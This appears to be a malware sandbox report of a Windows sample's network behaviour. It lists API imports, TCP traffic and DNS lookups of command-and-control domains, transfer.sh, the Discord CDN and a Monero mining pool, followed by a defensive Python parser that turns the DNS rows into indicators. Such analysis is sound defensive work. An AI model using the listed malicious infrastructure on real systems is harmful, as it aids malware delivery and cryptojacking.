OutputDebugStringA, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CloseHandle, CreateFileA

Possible Origin

Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands |
Spanish | Colombia |

Network Behavior

Network Port Distribution

TCP Packets

                                                                                                                                                                                            Jan 14, 2022 12:29:15.280463934 CET4978580192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.280479908 CET4978580192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.297588110 CET80497858.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.419229031 CET80497858.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.419337034 CET4978580192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.419637918 CET4978580192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.436743975 CET80497858.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.447879076 CET4978680192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.465063095 CET80497868.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.465157032 CET4978680192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.465264082 CET4978680192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.465290070 CET4978680192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.482394934 CET80497868.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.582700014 CET80497868.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.582720041 CET80497868.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.582781076 CET4978680192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.583050013 CET4978680192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.600171089 CET80497868.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.881963968 CET4978780192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.899432898 CET80497878.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:15.899548054 CET4978780192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.899692059 CET4978780192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:15.957561970 CET80497878.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:16.000572920 CET80497878.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:16.000614882 CET80497878.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:16.000653028 CET80497878.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:16.000673056 CET4978780192.168.2.48.209.70.0
                                                                                                                                                                                            Jan 14, 2022 12:29:16.000693083 CET80497878.209.70.0192.168.2.4
                                                                                                                                                                                            Jan 14, 2022 12:29:16.000731945 CET80497878.209.70.0192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                                                                                                                                            Jan 14, 2022 12:30:48.699079037 CET192.168.2.48.8.8.80xab12Standard query (0)pool.supportxmr.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:16.120827913 CET192.168.2.48.8.8.80x58e1Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:38.487710953 CET192.168.2.48.8.8.80xdeb8Standard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 14, 2022 12:29:11.800079107 CET | 8.8.8.8 | 192.168.2.4 | 0x67b5 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:12.274777889 CET | 8.8.8.8 | 192.168.2.4 | 0xe986 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:12.450135946 CET | 8.8.8.8 | 192.168.2.4 | 0x5bf4 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:12.944006920 CET | 8.8.8.8 | 192.168.2.4 | 0x4112 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:13.409914970 CET | 8.8.8.8 | 192.168.2.4 | 0xc21b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:13.583471060 CET | 8.8.8.8 | 192.168.2.4 | 0x8bf6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:15.262034893 CET | 8.8.8.8 | 192.168.2.4 | 0xa91d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:15.447199106 CET | 8.8.8.8 | 192.168.2.4 | 0xc66a | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:15.881325006 CET | 8.8.8.8 | 192.168.2.4 | 0xad10 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:17.699449062 CET | 8.8.8.8 | 192.168.2.4 | 0xd6ae | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:17.887447119 CET | 8.8.8.8 | 192.168.2.4 | 0xd89a | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:18.053019047 CET | 8.8.8.8 | 192.168.2.4 | 0x5ee7 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:18.355922937 CET | 8.8.8.8 | 192.168.2.4 | 0x54cb | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:18.790898085 CET | 8.8.8.8 | 192.168.2.4 | 0x89d2 | No error (0) | privacy-tools-for-you-780.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:20.656292915 CET | 8.8.8.8 | 192.168.2.4 | 0x6d1f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:20.820332050 CET | 8.8.8.8 | 192.168.2.4 | 0x68bb | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:21.072279930 CET | 8.8.8.8 | 192.168.2.4 | 0x3931 | No error (0) | unicupload.top | | 54.38.220.85 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:21.139534950 CET | 8.8.8.8 | 192.168.2.4 | 0x1d8b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:21.334872007 CET | 8.8.8.8 | 192.168.2.4 | 0x44e5 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:21.523125887 CET | 8.8.8.8 | 192.168.2.4 | 0x25c0 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:21.983006954 CET | 8.8.8.8 | 192.168.2.4 | 0x639b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:22.472062111 CET | 8.8.8.8 | 192.168.2.4 | 0x33a6 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:25.790760994 CET | 8.8.8.8 | 192.168.2.4 | 0xed2c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:25.954900026 CET | 8.8.8.8 | 192.168.2.4 | 0x2715 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:26.121053934 CET | 8.8.8.8 | 192.168.2.4 | 0x143d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:26.332964897 CET | 8.8.8.8 | 192.168.2.4 | 0x734e | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:29.135415077 CET | 8.8.8.8 | 192.168.2.4 | 0x33ca | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:29.312202930 CET | 8.8.8.8 | 192.168.2.4 | 0xdcf4 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:29.490415096 CET | 8.8.8.8 | 192.168.2.4 | 0xd6f7 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:29.678015947 CET | 8.8.8.8 | 192.168.2.4 | 0xb971 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:29.678015947 CET | 8.8.8.8 | 192.168.2.4 | 0xb971 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:29.678015947 CET | 8.8.8.8 | 192.168.2.4 | 0xb971 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:29.678015947 CET | 8.8.8.8 | 192.168.2.4 | 0xb971 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:29.678015947 CET | 8.8.8.8 | 192.168.2.4 | 0xb971 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:31.244934082 CET | 8.8.8.8 | 192.168.2.4 | 0x521d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:31.414046049 CET | 8.8.8.8 | 192.168.2.4 | 0x49bf | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:31.582149982 CET | 8.8.8.8 | 192.168.2.4 | 0x2eb3 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:41.910156012 CET | 8.8.8.8 | 192.168.2.4 | 0x87cb | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.54.36 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:41.910156012 CET | 8.8.8.8 | 192.168.2.4 | 0x87cb | No error (0) | microsoft-com.mail.protection.outlook.com | | 52.101.24.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:41.910156012 CET | 8.8.8.8 | 192.168.2.4 | 0x87cb | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:41.910156012 CET | 8.8.8.8 | 192.168.2.4 | 0x87cb | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.212.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:41.910156012 CET | 8.8.8.8 | 192.168.2.4 | 0x87cb | No error (0) | microsoft-com.mail.protection.outlook.com | | 40.93.207.1 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:41.910156012 CET | 8.8.8.8 | 192.168.2.4 | 0x87cb | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.53.36 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:44.645194054 CET | 8.8.8.8 | 192.168.2.4 | 0x1a68 | No error (0) | patmushta.info | | 94.142.143.116 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:53.220798969 CET | 8.8.8.8 | 192.168.2.4 | 0xdaf0 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:53.386814117 CET | 8.8.8.8 | 192.168.2.4 | 0x5b4c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:53.576463938 CET | 8.8.8.8 | 192.168.2.4 | 0x4a7c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:53.755656958 CET | 8.8.8.8 | 192.168.2.4 | 0x9d7e | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:53.921154976 CET | 8.8.8.8 | 192.168.2.4 | 0x17ca | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:54.085957050 CET | 8.8.8.8 | 192.168.2.4 | 0xb79f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:54.302371979 CET | 8.8.8.8 | 192.168.2.4 | 0x5c2f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:54.472028971 CET | 8.8.8.8 | 192.168.2.4 | 0x3d2f | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:54.636883974 CET | 8.8.8.8 | 192.168.2.4 | 0x4f2b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:54.817362070 CET | 8.8.8.8 | 192.168.2.4 | 0x4e70 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:54.985551119 CET | 8.8.8.8 | 192.168.2.4 | 0x25a4 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:55.164411068 CET | 8.8.8.8 | 192.168.2.4 | 0x8dcc | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:55.418090105 CET | 8.8.8.8 | 192.168.2.4 | 0xff6a | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:55.585751057 CET | 8.8.8.8 | 192.168.2.4 | 0xa5df | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:58.460091114 CET | 8.8.8.8 | 192.168.2.4 | 0x648d | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:58.626797915 CET | 8.8.8.8 | 192.168.2.4 | 0xd308 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:58.808177948 CET | 8.8.8.8 | 192.168.2.4 | 0x8226 | No error (0) | goo.su | | 172.67.139.105 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:58.808177948 CET | 8.8.8.8 | 192.168.2.4 | 0x8226 | No error (0) | goo.su | | 104.21.38.221 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:59.145658016 CET | 8.8.8.8 | 192.168.2.4 | 0x8d36 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:59.324620008 CET | 8.8.8.8 | 192.168.2.4 | 0xb0 | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:29:59.719247103 CET | 8.8.8.8 | 192.168.2.4 | 0xf035 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:00.052918911 CET | 8.8.8.8 | 192.168.2.4 | 0xb9a8 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:00.694416046 CET | 8.8.8.8 | 192.168.2.4 | 0x336 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:00.978961945 CET | 8.8.8.8 | 192.168.2.4 | 0x61e | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:01.340497971 CET | 8.8.8.8 | 192.168.2.4 | 0xf3f6 | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:04.158957005 CET | 8.8.8.8 | 192.168.2.4 | 0x82ed | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:04.332336903 CET | 8.8.8.8 | 192.168.2.4 | 0x43d2 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:04.546641111 CET | 8.8.8.8 | 192.168.2.4 | 0x4cb4 | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:07.397336960 CET | 8.8.8.8 | 192.168.2.4 | 0x7c19 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:07.579046965 CET | 8.8.8.8 | 192.168.2.4 | 0x3d62 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:07.752860069 CET | 8.8.8.8 | 192.168.2.4 | 0x7946 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:07.931826115 CET | 8.8.8.8 | 192.168.2.4 | 0x5623 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:08.159605980 CET | 8.8.8.8 | 192.168.2.4 | 0x598 | No error (0) | transfer.sh | | 144.76.136.153 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:11.243046999 CET | 8.8.8.8 | 192.168.2.4 | 0xfd8c | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:11.420278072 CET | 8.8.8.8 | 192.168.2.4 | 0x30ac | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:11.583112955 CET | 8.8.8.8 | 192.168.2.4 | 0x5efb | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:13.512223959 CET | 8.8.8.8 | 192.168.2.4 | 0xf3c6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:13.683284044 CET | 8.8.8.8 | 192.168.2.4 | 0xbbfe | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:13.870006084 CET | 8.8.8.8 | 192.168.2.4 | 0xfa1f | No error (0) | data-host-coin-8.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:15.946022034 CET | 8.8.8.8 | 192.168.2.4 | 0xe24a | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:16.161323071 CET | 8.8.8.8 | 192.168.2.4 | 0xa604 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:21.675123930 CET | 8.8.8.8 | 192.168.2.4 | 0x8116 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:21.865549088 CET | 8.8.8.8 | 192.168.2.4 | 0x6d9b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:22.220680952 CET | 8.8.8.8 | 192.168.2.4 | 0x510 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:25.792366028 CET | 8.8.8.8 | 192.168.2.4 | 0xb7b6 | No error (0) | patmushta.info | | 94.142.143.116 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:48.718033075 CET | 8.8.8.8 | 192.168.2.4 | 0xab12 | No error (0) | pool.supportxmr.com | pool-fr.supportxmr.com | | CNAME (Canonical name) | IN (0x0001)
Jan 14, 2022 12:30:48.718033075 CET | 8.8.8.8 | 192.168.2.4 | 0xab12 | No error (0) | pool-fr.supportxmr.com | | 149.202.83.171 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:48.718033075 CET | 8.8.8.8 | 192.168.2.4 | 0xab12 | No error (0) | pool-fr.supportxmr.com | | 91.121.140.167 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:48.718033075 CET | 8.8.8.8 | 192.168.2.4 | 0xab12 | No error (0) | pool-fr.supportxmr.com | | 37.187.95.110 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:48.718033075 CET | 8.8.8.8 | 192.168.2.4 | 0xab12 | No error (0) | pool-fr.supportxmr.com | | 94.23.23.52 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:30:48.718033075 CET | 8.8.8.8 | 192.168.2.4 | 0xab12 | No error (0) | pool-fr.supportxmr.com | | 94.23.247.226 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:31:16.139516115 CET | 8.8.8.8 | 192.168.2.4 | 0x58e1 | No error (0) | patmushta.info | | 94.142.143.116 | A (IP address) | IN (0x0001)
Jan 14, 2022 12:31:38.621751070 CET | 8.8.8.8 | 192.168.2.4 | 0xdeb8 | No error (0) | microsoft-com.mail.protection.outlook.com | | 104.47.54.36 | A (IP address) | IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:38.621751070 CET8.8.8.8192.168.2.40xdeb8No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:38.621751070 CET8.8.8.8192.168.2.40xdeb8No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:38.621751070 CET8.8.8.8192.168.2.40xdeb8No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:38.621751070 CET8.8.8.8192.168.2.40xdeb8No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                                                            Jan 14, 2022 12:31:38.621751070 CET8.8.8.8192.168.2.40xdeb8No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
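The DNS Answers rows above reach the page with their table cells run together ("8.8.8.8192.168.2.4", "pool.supportxmr.compool-fr.supportxmr.com"), which is how most copies of sandbox reports end up in ticketing systems and threat-intel notes. The Python below is an added example for this page, not Joe Sandbox code: it un-fuses those rows into records, resolves the two genuinely ambiguous splits (source/destination IP, and CNAME owner/target) with explicit rules instead of guesses, and collapses the answers into a host-to-IP IOC list that flags the Monero mining pool resolved at 12:30:48. The sample rows are copied from the table; the resolver address used as a tie-breaker (8.8.8.8) and the mining-pool suffix list are assumptions.

```python
"""Un-fuse Joe Sandbox 'DNS Answers' rows (cells glued together by extraction) into IOC records.

Added example for this report page, not Joe Sandbox code. Two fields need splitting:
source+destination IP ('8.8.8.8192.168.2.4') and owner+rdata
('pool.supportxmr.compool-fr.supportxmr.com'); both can be ambiguous.
"""
import re
from collections import defaultdict

# Rows copied from the report's DNS Answers table (a representative subset).
SAMPLE_ROWS = [
    "Jan 14, 2022 12:30:15.946022034 CET8.8.8.8192.168.2.40xe24aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)",
    "Jan 14, 2022 12:30:25.792366028 CET8.8.8.8192.168.2.40xb7b6No error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)",
    "Jan 14, 2022 12:30:48.718033075 CET8.8.8.8192.168.2.40xab12No error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)",
    "Jan 14, 2022 12:30:48.718033075 CET8.8.8.8192.168.2.40xab12No error (0)pool-fr.supportxmr.com149.202.83.171A (IP address)IN (0x0001)",
    "Jan 14, 2022 12:30:48.718033075 CET8.8.8.8192.168.2.40xab12No error (0)pool-fr.supportxmr.com91.121.140.167A (IP address)IN (0x0001)",
]

ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]{3,4})"
    r"(?P<ips>[\d.]+?)"                    # src IP + dst IP, fused
    r"0x(?P<txid>[0-9a-f]{1,4})"           # DNS transaction id
    r"(?P<rcode>[A-Z][^()]*\(\d+\))"       # e.g. 'No error (0)'
    r"(?P<payload>.+?)"                    # owner name + rdata, fused
    r"(?P<rtype>A \(IP address\)|CNAME \(Canonical name\))"
    r"(?P<rclass>IN \(0x[0-9a-f]+\))$"
)
IPV4_RE = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")
# TLDs are alphabetic: the owner name ends in a letter and the IPv4 rdata starts at the next digit.
A_PAYLOAD_RE = re.compile(r"^(?P<name>.+?[A-Za-z])(?P<ip>(?:\d{1,3}\.){3}\d{1,3})$")
HOSTNAME_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$")
KNOWN_RESOLVERS = {"8.8.8.8"}             # assumption: the sandbox resolver, used only as a tie-breaker
MINING_POOL_DOMAINS = {"supportxmr.com"}  # constructed watchlist: a public Monero mining pool


def split_ips(fused):
    """Split 'srcdst' into (src, dst); None when no rule selects a single split."""
    candidates = [(fused[:i], fused[i:]) for i in range(1, len(fused))
                  if IPV4_RE.match(fused[:i]) and IPV4_RE.match(fused[i:])]
    if len(candidates) == 1:
        return candidates[0]
    preferred = [c for c in candidates if c[0] in KNOWN_RESOLVERS]
    return preferred[0] if len(preferred) == 1 else None


def split_a_payload(payload):
    m = A_PAYLOAD_RE.match(payload)
    if not m or not IPV4_RE.match(m.group("ip")):
        raise ValueError(f"cannot split A-record payload: {payload!r}")
    return m.group("name"), m.group("ip")


def split_cname_payload(payload, owners_in_txn):
    """The CNAME target must be the owner of an A record in the same transaction;
    that fixes where 'ownertarget' is cut."""
    hits = [(payload[:-len(t)], t) for t in owners_in_txn
            if payload.endswith(t) and HOSTNAME_RE.match(payload[:-len(t)])]
    if len(hits) != 1:
        raise ValueError(f"ambiguous CNAME payload: {payload!r} -> {hits}")
    return hits[0]


def parse_rows(rows):
    """Two passes: A records first, because their owner names disambiguate the CNAMEs."""
    records, pending, owners_by_txid = [], [], defaultdict(set)
    for row in rows:
        m = ROW_RE.match(row.strip())
        if not m:
            raise ValueError(f"unrecognised row: {row!r}")
        ips = split_ips(m.group("ips"))
        if ips is None:
            raise ValueError(f"ambiguous src/dst pair: {m.group('ips')!r}")
        base = {"timestamp": m.group("ts"), "src": ips[0], "dst": ips[1],
                "txid": m.group("txid"), "rcode": m.group("rcode")}
        if m.group("rtype").startswith("A "):
            name, ip = split_a_payload(m.group("payload"))
            owners_by_txid[base["txid"]].add(name)
            records.append({**base, "type": "A", "name": name, "rdata": ip})
        else:
            pending.append((base, m.group("payload")))
    for base, payload in pending:
        owner, target = split_cname_payload(payload, owners_by_txid[base["txid"]])
        records.append({**base, "type": "CNAME", "name": owner, "rdata": target})
    return records


def is_under(name, domains):
    return any(name == d or name.endswith("." + d) for d in domains)


def ioc_table(records):
    """Host -> resolved IPs, following CNAME chains, with a mining-pool flag."""
    a_by_name, cname = defaultdict(set), {}
    for r in records:
        if r["type"] == "A":
            a_by_name[r["name"]].add(r["rdata"])
        else:
            cname[r["name"]] = r["rdata"]
    table = {}
    for name in set(a_by_name) | set(cname):
        target, hops = name, 0
        while target in cname and hops < 8:      # guard against CNAME loops
            target, hops = cname[target], hops + 1
        table[name] = {"resolves_via": target if target != name else None,
                       "ips": sorted(a_by_name.get(target, ())),
                       "mining_pool": is_under(name, MINING_POOL_DOMAINS)}
    return table


if __name__ == "__main__":
    for name, info in sorted(ioc_table(parse_rows(SAMPLE_ROWS)).items()):
        via = f" (CNAME -> {info['resolves_via']})" if info["resolves_via"] else ""
        flag = "   <-- cryptomining pool" if info["mining_pool"] else ""
        print(f"{name}{via}: {', '.join(info['ips'])}{flag}")
```

The source/destination split is the part that deserves care: "8.8.8.8192.168.2.4" also parses as "8.8.8.81" + "92.168.2.4", so a naive regex silently produces a wrong IOC. The parser enumerates every valid split, accepts a unique one, and otherwise falls back to the known-resolver tie-breaker; anything still ambiguous is rejected rather than recorded. The CNAME split uses the same idea with a different oracle: the target must be the owner of an A record in the same transaction, which the 0xab12 rows supply.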

HTTP Request Dependency Graph

• rrooukv.org
  • host-data-coin-11.com
• rxyqqf.net
• dutgomfkc.net
• qwfulsm.net
• rxkloxn.com
• hopcq.com
• ocnbwlevej.org
• gdffxf.org
• data-host-coin-8.com
• psgcnvvm.org
• vxjxd.org
